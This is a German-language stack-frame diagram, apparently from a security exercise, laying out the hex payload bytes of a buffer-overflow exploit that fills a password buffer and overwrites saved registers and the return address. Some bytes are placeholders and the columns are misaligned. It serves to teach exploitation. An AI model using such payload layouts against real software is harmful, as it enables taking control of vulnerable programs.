

Speicherlayout @eip = 0x56556297

	Beschreibung des Speicherbereiches	Größe in Byte		Stackframe für den Exploit				
	Vorheriger Speicher	-		Vorheriger Speicher				
Speicheradressen ↓ 0xFFFFFFFF 0x00000000	Parameters	4	<i>char*</i>	\x3a	\xd7	\xff	\xff	
	Return Address	4		\x28	\x63	\x55	\x56	
	Saved Registers	8	<i>saved ebp</i>	\x28	\xd5	\xff	\xff	
	/usr/lib32/libc-2.31.so	4	<i>saved ebx</i>	\xc8	\x8f	\x55	\x56	
	Local Variables ↳ char char char char [12] Nullbyte, sodass Stackgröße vielfaches der Wertbreite	15 (+1)		<i>libc/shiny terminator</i>	\x00	\xd0	\xfb	\xf7
					\x41	\x4f	\x6b	\x21
<i>Password</i>				\x41	\x41	\x41	\x41	
				\x41	\x41	\x41	\x41	
				\x00	\x41	\x41	\x41	
<i>Password buffer</i>				\x?	\x?	\x?	\x?	
	Freier Speicher	-		Freier Speicher				